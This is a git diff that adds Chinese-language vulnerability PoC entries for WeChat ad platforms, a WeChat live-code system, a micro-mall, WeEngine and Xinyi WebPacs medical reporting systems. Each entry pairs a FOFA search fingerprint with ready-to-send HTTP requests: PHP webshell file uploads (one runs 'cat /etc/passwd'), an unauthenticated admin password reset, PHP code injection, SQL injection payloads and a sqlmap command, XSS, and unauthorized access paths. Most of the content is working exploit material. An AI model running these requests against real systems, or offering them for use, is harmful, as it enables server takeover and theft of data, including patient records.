+POST /index.php?m=&c=IndexAjax&a=Upload HTTP/1.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br, zstd
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Cache-Control: no-cache
+Connection: keep-alive
+Content-Length: 78
+Content-Type: application/x-www-form-urlencoded
+Cookie: PHPSESSID=bf13e78oe1uqp8nh3crld1gu55; uloginid=107639
+Host: 127.0.0.1
+Origin: http://127.0.0.1
+Pragma: no-cache
+Referer: http://127.0.0.1/index.php?m=&c=IndexAjax
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
+sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Windows"
+
+img=data:image/php;base64,YTw/cGhwIHBocGluZm8oKTs/Pg==&size=50
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410071436370.webp)
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/NL7sKpAiajkp_aIoPNZEDQ
+
diff --git a/微信广告任务平台ajax_upload存在任意文件上传漏洞.md b/微信广告任务平台ajax_upload存在任意文件上传漏洞.md
new file mode 100644
index 0000000..543fbae
--- /dev/null
+++ b/微信广告任务平台ajax_upload存在任意文件上传漏洞.md
@@ -0,0 +1,47 @@
+# 微信广告任务平台 ajax_upload存在任意文件上传漏洞
+
+# 一、漏洞简介
+微信广告任务平台ajax_upload存在任意文件上传漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。
+
+# 二、影响版本
++ 微信广告任务平台
+
+# 三、资产测绘
++ fofa`"/tpl/Public/js/func.js"`
++ 特征
+
+![1727407956123-3442212d-99d7-4de5-8733-ed2089d55960.png](./img/Y73xFAtkBGmAxNK9/1727407956123-3442212d-99d7-4de5-8733-ed2089d55960-108936.png)
+
+# 四、漏洞复现
+```java
+POST /index.php/Home/index/ajax_upload HTTP/1.1
+Host: 
+Connection: keep-alive
+Content-Length: 197
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCc7iBZFp1mvojsxn
+Accept: */*
+Origin: http://127.0.0.1
+Referer: http://127.0.0.1/index.php/Home/Index/index.html
+Cookie: think_language=zh-CN; BJYADMIN=2150gjbkj92r835kg2dn9u9i75
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.0.0 Safari/537.36
+
+------WebKitFormBoundaryCc7iBZFp1mvojsxn
+Content-Disposition: form-data; name="file"; filename="1.php"
+Content-Type: image/jpeg
+
+<?php phpinfo();?>
+------WebKitFormBoundaryCc7iBZFp1mvojsxn--
+```
+
+![1727407992383-97ec806a-1961-4feb-b6c8-f3df0bde519b.png](./img/Y73xFAtkBGmAxNK9/1727407992383-97ec806a-1961-4feb-b6c8-f3df0bde519b-364394.png)
+
+```java
+https://xxxx/Uploads/images/2024-09-27/66f626b7a5af8.php
+```
+
+![1727408017462-be496d1f-b3c1-4344-bdbd-fc1f41b87e83.png](./img/Y73xFAtkBGmAxNK9/1727408017462-be496d1f-b3c1-4344-bdbd-fc1f41b87e83-782850.png)
+
+
+
+> 更新: 2024-10-22 09:36:08  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zhsn7ptr9pmr61nd>
\ No newline at end of file
diff --git a/微信广告任务平台存在任意文件上传漏洞.md b/微信广告任务平台存在任意文件上传漏洞.md
new file mode 100644
index 0000000..3f67e60
--- /dev/null
+++ b/微信广告任务平台存在任意文件上传漏洞.md
@@ -0,0 +1,43 @@
+# 微信广告任务平台存在任意文件上传漏洞
+
+微信广告任务平台存在任意文件上传漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。
+
+## fofa
+
+```javascript
+"/tpl/Public/js/func.js"
+```
+
+![6f864edff209980117cfbf97e6d47bab](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409240936570.png)
+
+## poc
+
+注意 这里需要普通用户登录之后操作.
+
+```javascript
+POST /index.php/Home/index/ajax_upload HTTP/1.1
+Host: 127.0.0.1
+Connection: keep-alive
+Content-Length: 197
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCc7iBZFp1mvojsxn
+Accept: */*
+Origin: http://127.0.0.1
+Referer: http://127.0.0.1/index.php/Home/Index/index.html
+Cookie: think_language=zh-CN; BJYADMIN=2150gjbkj92r835kg2dn9u9i75
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.0.0 Safari/537.36
+
+------WebKitFormBoundaryCc7iBZFp1mvojsxn
+Content-Disposition: form-data; name="file"; filename="1.php"
+Content-Type: image/jpeg
+
+<?php phpinfo();?>
+------WebKitFormBoundaryCc7iBZFp1mvojsxn--
+```
+
+![35b6a5932d2f61c8b056edd7d83983b1](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409240936176.jpg)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/t3guPQ6s2GCMU4xZPmEeYw
\ No newline at end of file
diff --git a/微信活码系统index存在SQL注入漏洞.md b/微信活码系统index存在SQL注入漏洞.md
new file mode 100644
index 0000000..f0639f2
--- /dev/null
+++ b/微信活码系统index存在SQL注入漏洞.md
@@ -0,0 +1,30 @@
+# 微信活码系统index存在SQL注入漏洞
+
+# 一、漏洞简介
+微信活码系统是基于微信平台的 二维码只管理系统，旨在帮助企业和个人实现更高效的社群运营和流量管理。可以将多个二维码合并成一个二维码的工具，用户扫描该固定二维码后，可以看到一个微信二维码(可以是群二维码，也可以是个人名片二维码)，而这些二维码可以在后台随时进行更换。通过这种方式，微信活码系统有效避免了因频繁更换二维码导致的流量丢失，提高了社群运营的效率。微信活码系统index存在SQL注入漏洞
+
+# 二、影响版本
++ 微信活码系统
+
+# 三、资产测绘
++ fofa `body=".qn-user-login"`
++ 特征
+
+![1732275497192-0cf606aa-431c-438b-b554-a0b15c384708.png](./img/wJghLzqoOCcyak_L/1732275497192-0cf606aa-431c-438b-b554-a0b15c384708-812866.png)
+
+# 四、漏洞复现
+```java
+GET /ucenter/index/?uid=1)%20AND%20(SELECT%203460%20FROM%20(SELECT(SLEEP(5)))RkHL)%20AND%20(1015=1015 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip
+Connection: close
+```
+
+![1732275546711-b42add2f-5705-45a8-9128-49d5d4bdc35e.png](./img/wJghLzqoOCcyak_L/1732275546711-b42add2f-5705-45a8-9128-49d5d4bdc35e-612056.png)
+
+
+
+> 更新: 2024-11-27 10:00:05  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gn9zt676czv8oypd>
\ No newline at end of file
diff --git a/微信活码系统updateInfos前台未授权任意用户密码修改.md b/微信活码系统updateInfos前台未授权任意用户密码修改.md
new file mode 100644
index 0000000..0736108
--- /dev/null
+++ b/微信活码系统updateInfos前台未授权任意用户密码修改.md
@@ -0,0 +1,30 @@
+# 微信活码系统updateInfos前台未授权任意用户密码修改
+
+## fofa
+
+```javascript
+body=".qn-user-login"
+```
+
+## poc
+
+默认管理员用户名为admin且uid为1
+
+```javascript
+POST /index.php?s=/api/user/updateInfos HTTP/1.1
+Host: 192.168.18.137
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Priority: u=0
+X-Requested-With: XMLHttpRequest
+Origin: http://192.168.18.137
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.18.137/index.php?s=/manage/cron/index
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Length: 38
+
+uid=1&data[password]=123456789
+```
+
+![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411201419577.png)
\ No newline at end of file
diff --git a/微信活码系统后台任意内容写入.md b/微信活码系统后台任意内容写入.md
new file mode 100644
index 0000000..fbf5c0b
--- /dev/null
+++ b/微信活码系统后台任意内容写入.md
@@ -0,0 +1,33 @@
+# 微信活码系统后台任意内容写入
+
+## fofa
+
+```javascript
+body=".qn-user-login"
+```
+
+## poc
+
+```javascript
+POST /index.php?s=/manage/cron/index HTTP/1.1
+Host: 192.168.18.137
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Cookie: think_language=zh-CN; PHPSESSID=6e7n0os6qsvnlsthdns1dj1n95; qn_admin_think_language=zh-CN; qn_admin___forward__=%2Findex.php%3Fs%3D%2Fmanage%2Fconfig%2Findex; qn_admin_video_get_info=%2Findex.php%3Fs%3D%2Fhome%2Fpublic%2Fgetvideo
+Priority: u=0
+X-Requested-With: XMLHttpRequest
+Origin: http://192.168.18.137
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.18.137/index.php?s=/manage/cron/index
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Length: 38
+
+QUEUE_SET=%3C%3Fphp+phpinfo()%3B%3F%3E
+```
+
+![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411201420483.png)
+
+![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411201421522.png)
+
+文件地址：`/data/auto.php`
\ No newline at end of file
diff --git a/微商城系统api.php存在文件上传漏洞.md b/微商城系统api.php存在文件上传漏洞.md
new file mode 100644
index 0000000..bad8825
--- /dev/null
+++ b/微商城系统api.php存在文件上传漏洞.md
@@ -0,0 +1,27 @@
+# 微商城系统api.php存在文件上传漏洞
+
+微商城系统 api.php 接口处存在任意文件上传漏洞，未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
+
+## fofa
+
+```yaml
+body="/Mao_Public/js/jquery-2.1.1.min.js"
+```
+
+## poc
+
+```java
+POST /api/api.php?mod=upload&type=1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTqkdY1lCvbvpmown
+ 
+------WebKitFormBoundaryaKljzbg49Mq4ggLz
+Content-Disposition: form-data; name="file"; filename="rce.php"
+Content-Type: image/png
+ 
+<?php system("cat /etc/passwd");unlink(__FILE__);?>
+------WebKitFormBoundaryaKljzbg49Mq4ggLz--
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408210938048.png)
\ No newline at end of file
diff --git a/微商城系统goods.php存在SQL注入漏洞.md b/微商城系统goods.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..2998252
--- /dev/null
+++ b/微商城系统goods.php存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+# 微商城系统goods.php存在SQL注入漏洞
+
+微商城系统 goods.php 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```yaml
+body="/Mao_Public/js/jquery-2.1.1.min.js"
+```
+
+## poc
+
+```java
+GET /goods.php?id='+UNION+ALL+SELECT+NULL,NULL,NULL,CONCAT(IFNULL(CAST(MD5(1)+AS+NCHAR),0x20)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
+Accept: */*
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+![img](https://i-blog.csdnimg.cn/direct/2493a6cdfcc046d6b686dae6f3615fee.png)
\ No newline at end of file
diff --git a/微擎微信公众号管理系统系统AccountEdit存在任意文件上传漏洞.md b/微擎微信公众号管理系统系统AccountEdit存在任意文件上传漏洞.md
new file mode 100644
index 0000000..bc867c8
--- /dev/null
+++ b/微擎微信公众号管理系统系统AccountEdit存在任意文件上传漏洞.md
@@ -0,0 +1,77 @@
+# 微擎微信公众号管理系统系统AccountEdit存在任意文件上传漏洞
+
+# 一、漏洞简介
+微擎是一款免费开源的微信公众号管理系统，基于目前流行的WEB2.0架构（php+mysql），支持在线升级和安装模块及模板，拥有良好的开发框架、成熟稳定的技术解决方案、活跃的第三方开发者及开发团队，依托微擎开放的生态系统，提供丰富的扩展功能。微擎系统 AccountEdit接口处存在任意文件上传漏洞，恶意攻击者可以上传恶意软件，例如后门、木马或勒索软件，以获取对服务器的远程访问权限或者破坏系统，对服务器造成极大的安全隐患。
+
+# 二、影响版本
++ 微擎微信公众号管理系统
+
+# 三、资产测绘
++ `body="/Widgets/WidgetCollection/"`
++ 特征![1715655966659-2691b81b-3f4e-405e-9818-bcae75084313.png](./img/KG8Se_y6bFrAXpwJ/1715655966659-2691b81b-3f4e-405e-9818-bcae75084313-147515.png)
+
+# 四、漏洞复现
+ 1、获取__VIEWSTATE和__EVENTVALIDATION值  
+
+```plain
+GET /User/AccountEdit.aspx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Length: 0
+```
+
+![1715656132996-7dfb6248-fb87-4da1-a225-0c4bdac8a293.png](./img/KG8Se_y6bFrAXpwJ/1715656132996-7dfb6248-fb87-4da1-a225-0c4bdac8a293-876973.png)
+
+ 2、使用获取到的相应值上传文件  
+
+```plain
+POST /User/AccountEdit.aspx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Accept-Encoding: gzip, deflate, br
+Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
+
+-----------------------------786435874t38587593865736587346567358735687
+Content-Disposition: form-data; name="__VIEWSTATE"
+
+/wEPDwUJNjcyMTYyMDMwD2QWAmYPZBYCAgcPZBYCAgEQFgIeB2VuY3R5cGUFE211bHRpcGFydC9mb3JtLWRhdGFkFgICAQ8PFgIeBFRleHQFigI8TEkgY2xhc3M9VGFiSW4gaWQ9dGFiMSBzdHlsZT0nZGlzcGxheTonPjxBPuWfuuacrOS/oeaBrzwvQT4gPC9MST48TEkgY2xhc3M9VGFiT3V0IGlkPXRhYjQgIHN0eWxlPSdkaXNwbGF5Oic+PEEgIGhyZWY9L1VzZXIvQWNjb3VudEVkaXQuYXNweD90YWI9ND7pgInpobk8L0E+IDwvTEk+PExJIGNsYXNzPVRhYk91dCBpZD10YWI1ICBzdHlsZT0nZGlzcGxheTonPjxBICBocmVmPS9Vc2VyL0FjY291bnRFZGl0LmFzcHg/dGFiPTU+5a+G56CB6K6+572uPC9BPiA8L0xJPmRkZOX0i8mrnQ9ovw3e1OKO9NtVXO50
+-----------------------------786435874t38587593865736587346567358735687
+Content-Disposition: form-data; name="__EVENTVALIDATION"
+
+/wEWBgKYv82vCAK8ko+sCwLj7JnWDwKavpXnAwKmyMubDAKW1typA0S4QAUrxTuiaAZtLTFPDJ6Hk6Mh
+-----------------------------786435874t38587593865736587346567358735687
+Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="ceshi.txt"
+Content-Type: text/plain
+
+nihaoanyun
+-----------------------------786435874t38587593865736587346567358735687
+Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
+
+上传图片
+-----------------------------786435874t38587593865736587346567358735687
+Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
+
+
+-----------------------------786435874t38587593865736587346567358735687
+Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
+
+
+-----------------------------786435874t38587593865736587346567358735687--
+```
+
+![1715656234280-31951fd0-70ff-453f-a111-f22b770a31b4.png](./img/KG8Se_y6bFrAXpwJ/1715656234280-31951fd0-70ff-453f-a111-f22b770a31b4-490989.png)
+
+3、访问上传文件
+
+```plain
+/_data/Uploads/xxx.txt
+```
+
+![1715656329056-51847e50-b1c8-4c99-8b34-5619819dc5ac.png](./img/KG8Se_y6bFrAXpwJ/1715656329056-51847e50-b1c8-4c99-8b34-5619819dc5ac-259114.png)
+
+![1715656372427-2ad70d86-e7cc-4162-bbde-088bed453bac.png](./img/KG8Se_y6bFrAXpwJ/1715656372427-2ad70d86-e7cc-4162-bbde-088bed453bac-696343.png)
+
+
+
+> 更新: 2024-05-14 11:15:15  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qntnmc5zz1xvm56h>
\ No newline at end of file
diff --git a/心医国际WebPacs系统存在SQL注入漏洞.md b/心医国际WebPacs系统存在SQL注入漏洞.md
new file mode 100644
index 0000000..fd43496
--- /dev/null
+++ b/心医国际WebPacs系统存在SQL注入漏洞.md
@@ -0,0 +1,27 @@
+# 心医国际WebPacs系统存在SQL注入漏洞
+
+**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);">心医国际是中国专业的医疗云应用解决方案提供商，铺建并运营全国领先的智能医疗云平台，依托十年的数据积累和业务实践，持续创新智能医疗场景应用。业务服务覆盖诊疗、教学、科研、管理等多维度，助力政府、医院及产业合作伙伴，打造线上线下高效协同的智慧医疗健康服务体系，目前已建成覆盖全国31个省，联结2万余家医疗机构的智能医疗云平台，助力建设并服务青海、河南、陕西、山西、贵州、新疆、江西、广西、甘肃9大省级远程医疗平台，服务通达80%全国三甲级医院;成功建设并服务全国300余个省、市、县及专科医联体。心心医国际医技统计报表系统存在SQL注入漏洞，攻击者可通过该漏洞获取系统敏感信息  
+</font>**<font style="color:rgb(38, 38, 38);">二、影响版本</font>**<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);">心医国际WebPacs系统</font>![1714377037227-b954ff03-9791-4ba5-8249-d4f3ced98a2a.png](./img/j3up_6YSZduk9VZa/1714377037227-b954ff03-9791-4ba5-8249-d4f3ced98a2a-754504.png)<font style="color:rgb(38, 38, 38);">  
+</font>**<font style="color:rgb(38, 38, 38);">三、漏洞复现</font>**
+
+```plain
+POST /WebPacs/webpacs/studylistgrid HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Content-type: application/x-www-form-urlencoded; charset=UTF-8
+Connection: close
+Content-Length: 154
+
+type=normal&jianchahao=&department=&filmstate=&truename=&devicetypename=&studystatus=&patienttype=&huanzhehao=&devicename=&datelength=7&page=1&pageSize=10
+```
+
+![1714376981011-1284d41f-097b-4b1c-85ca-9db879bf108d.png](./img/j3up_6YSZduk9VZa/1714376981011-1284d41f-097b-4b1c-85ca-9db879bf108d-746259.png)
+
+
+
+
+
+> 更新: 2024-06-17 09:27:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hg0bkutvaqknmatg>
\ No newline at end of file
diff --git a/心医国际WebPacs系统存在XSS漏洞.md b/心医国际WebPacs系统存在XSS漏洞.md
new file mode 100644
index 0000000..2584bef
--- /dev/null
+++ b/心医国际WebPacs系统存在XSS漏洞.md
@@ -0,0 +1,18 @@
+# 心医国际WebPacs系统存在XSS漏洞
+
+**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);">心医国际是中国专业的医疗云应用解决方案提供商，铺建并运营全国领先的智能医疗云平台，依托十年的数据积累和业务实践，持续创新智能医疗场景应用。业务服务覆盖诊疗、教学、科研、管理等多维度，助力政府、医院及产业合作伙伴，打造线上线下高效协同的智慧医疗健康服务体系，目前已建成覆盖全国31个省，联结2万余家医疗机构的智能医疗云平台，助力建设并服务青海、河南、陕西、山西、贵州、新疆、江西、广西、甘肃9大省级远程医疗平台，服务通达80%全国三甲级医院;成功建设并服务全国300余个省、市、县及专科医联体。心心医国际WebPacs系统存在XSS漏洞  
+</font>**<font style="color:rgb(38, 38, 38);">二、漏洞复现</font>**
+
+```plain
+http://127.0.0.1/WebPacs/webpacs/pacsview?xeguid=%27-alert(123)(1)-%27&view=report
+```
+
+![1714378559826-ac84ebc3-5c0e-4735-881c-c5f9982ad68c.png](./img/UqwwuBHtIb6gDHbZ/1714378559826-ac84ebc3-5c0e-4735-881c-c5f9982ad68c-566514.png)
+
+
+
+
+
+> 更新: 2024-06-17 09:27:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lfhr7qyafn7qabkz>
\ No newline at end of file
diff --git a/心医国际WebPacs系统存在未授权访问漏洞.md b/心医国际WebPacs系统存在未授权访问漏洞.md
new file mode 100644
index 0000000..2eb9030
--- /dev/null
+++ b/心医国际WebPacs系统存在未授权访问漏洞.md
@@ -0,0 +1,18 @@
+# 心医国际WebPacs系统存在未授权访问漏洞
+
+**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);">心医国际是中国专业的医疗云应用解决方案提供商，铺建并运营全国领先的智能医疗云平台，依托十年的数据积累和业务实践，持续创新智能医疗场景应用。业务服务覆盖诊疗、教学、科研、管理等多维度，助力政府、医院及产业合作伙伴，打造线上线下高效协同的智慧医疗健康服务体系，目前已建成覆盖全国31个省，联结2万余家医疗机构的智能医疗云平台，助力建设并服务青海、河南、陕西、山西、贵州、新疆、江西、广西、甘肃9大省级远程医疗平台，服务通达80%全国三甲级医院;成功建设并服务全国300余个省、市、县及专科医联体。心心医国际医技统计报表系统存在未授权访问漏洞，攻击者可通过该漏洞获取系统敏感信息  
+</font>**<font style="color:rgb(38, 38, 38);">二、漏洞复现</font>**
+
+```plain
+/WebPacs/webpacs/pacs
+```
+
+![1714377119940-e310f7ff-0646-46ef-8fdc-6f04650116f1.png](./img/hZdTMQthxVtuKvY4/1714377119940-e310f7ff-0646-46ef-8fdc-6f04650116f1-034280.png)
+
+
+
+
+
+> 更新: 2024-06-17 09:27:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/glibrpuqkoqgg9wz>
\ No newline at end of file
diff --git a/心医国际医技统计报表系统存在SQL注入漏洞.md b/心医国际医技统计报表系统存在SQL注入漏洞.md
new file mode 100644
index 0000000..981b4cb
--- /dev/null
+++ b/心医国际医技统计报表系统存在SQL注入漏洞.md
@@ -0,0 +1,20 @@
+# 心医国际医技统计报表系统存在SQL注入漏洞
+
+**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);">心医国际是中国专业的医疗云应用解决方案提供商，铺建并运营全国领先的智能医疗云平台，依托十年的数据积累和业务实践，持续创新智能医疗场景应用。业务服务覆盖诊疗、教学、科研、管理等多维度，助力政府、医院及产业合作伙伴，打造线上线下高效协同的智慧医疗健康服务体系，目前已建成覆盖全国31个省，联结2万余家医疗机构的智能医疗云平台，助力建设并服务青海、河南、陕西、山西、贵州、新疆、江西、广西、甘肃9大省级远程医疗平台，服务通达80%全国三甲级医院;成功建设并服务全国300余个省、市、县及专科医联体。心心医国际医技统计报表系统存在SQL注入漏洞，攻击者可通过该漏洞获取系统敏感信息  
+</font>**<font style="color:rgb(38, 38, 38);">二、影响版本</font>**<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);">心医国际医技统计报表</font>![1714374819079-557cb0bb-eb99-43fd-bdbe-e10c186b405f.png](./img/S4nzAYLJAV3ALS5_/1714374819079-557cb0bb-eb99-43fd-bdbe-e10c186b405f-912662.png)<font style="color:rgb(38, 38, 38);">  
+</font>**<font style="color:rgb(38, 38, 38);">三、漏洞复现</font>**
+
+```plain
+python3 sqlmap.py -u "http://127.0.0.1/EasyReport/login.do?method=handleRequestRole&t=731&userid=admin&_=1714374538731" -p userid
+```
+
+![1714374865701-7324443d-3be6-4063-ad61-a052c6b455ee.png](./img/S4nzAYLJAV3ALS5_/1714374865701-7324443d-3be6-4063-ad61-a052c6b455ee-234969.png)
+
+
+
+
+
+> 更新: 2024-06-17 09:27:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cvggxfx71i5i1y2x>
\ No newline at end of file
diff --git a/心医国际医技统计报表系统存在XSS漏洞.md b/心医国际医技统计报表系统存在XSS漏洞.md
new file mode 100644
index 0000000..851ea83
--- /dev/null
+++ b/心医国际医技统计报表系统存在XSS漏洞.md
@@ -0,0 +1,30 @@
+# 心医国际医技统计报表系统存在XSS漏洞
+
+**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);">心医国际是中国专业的医疗云应用解决方案提供商，铺建并运营全国领先的智能医疗云平台，依托十年的数据积累和业务实践，持续创新智能医疗场景应用。业务服务覆盖诊疗、教学、科研、管理等多维度，助力政府、医院及产业合作伙伴，打造线上线下高效协同的智慧医疗健康服务体系，目前已建成覆盖全国31个省，联结2万余家医疗机构的智能医疗云平台，助力建设并服务青海、河南、陕西、山西、贵州、新疆、江西、广西、甘肃9大省级远程医疗平台，服务通达80%全国三甲级医院;成功建设并服务全国300余个省、市、县及专科医联体。心心医国际医技统计报表系统存在XSS漏洞  
+</font>**<font style="color:rgb(38, 38, 38);">二、影响版本</font>**<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);">心医国际医技统计报表</font>![1714374819079-557cb0bb-eb99-43fd-bdbe-e10c186b405f.png](./img/4yG1B6lXa12dD60v/1714374819079-557cb0bb-eb99-43fd-bdbe-e10c186b405f-348600.png)<font style="color:rgb(38, 38, 38);">  
+</font>**<font style="color:rgb(38, 38, 38);">三、漏洞复现</font>**
+
+```plain
+POST /EasyReport/login.do?method=handleRequestInternal HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Content-Length: 55
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Language: zh-CN,zh;q=0.9
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+Cookie: JSESSIONID=E590069FD1A0C5B3ACA365A9A270FD01
+Upgrade-Insecure-Requests: 1
+Accept-Encoding: gzip
+
+pwd=admin&userid="><ScRiPt>alert(1)</sCrIpT>&userrole=0
+```
+
+![1714378510351-d404cf53-907d-4f32-8083-9eef103238d9.png](./img/4yG1B6lXa12dD60v/1714378510351-d404cf53-907d-4f32-8083-9eef103238d9-698289.png)
+
+
+
+> 更新: 2024-06-17 09:27:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/py7flewrq4o85dbe>
\ No newline at end of file
diff --git a/心医国际医技统计报表系统存在信息泄露及弱口令漏洞.md b/心医国际医技统计报表系统存在信息泄露及弱口令漏洞.md
new file mode 100644
index 0000000..bc5d434
--- /dev/null
+++ b/心医国际医技统计报表系统存在信息泄露及弱口令漏洞.md
@@ -0,0 +1,20 @@
+# 心医国际医技统计报表系统存在信息泄露及弱口令漏洞
+
+**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);">心医国际是中国专业的医疗云应用解决方案提供商，铺建并运营全国领先的智能医疗云平台，依托十年的数据积累和业务实践，持续创新智能医疗场景应用。业务服务覆盖诊疗、教学、科研、管理等多维度，助力政府、医院及产业合作伙伴，打造线上线下高效协同的智慧医疗健康服务体系，目前已建成覆盖全国31个省，联结2万余家医疗机构的智能医疗云平台，助力建设并服务青海、河南、陕西、山西、贵州、新疆、江西、广西、甘肃9大省级远程医疗平台，服务通达80%全国三甲级医院;成功建设并服务全国300余个省、市、县及专科医联体。心心医国际医技统计报表系统存在弱口令漏洞，攻击者可通过该漏洞登录系统  
+</font>**<font style="color:rgb(38, 38, 38);">二、影响版本</font>**<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);">心医国际医技统计报表</font>![1714374819079-557cb0bb-eb99-43fd-bdbe-e10c186b405f.png](./img/EDqPjrxaNQ226zBw/1714374819079-557cb0bb-eb99-43fd-bdbe-e10c186b405f-042652.png)<font style="color:rgb(38, 38, 38);">  
+</font>**<font style="color:rgb(38, 38, 38);">三、漏洞复现</font>**
+
+```plain
+http://172.75.79.22:8090/EasyReport/login.do?method=loginPage
+```
+
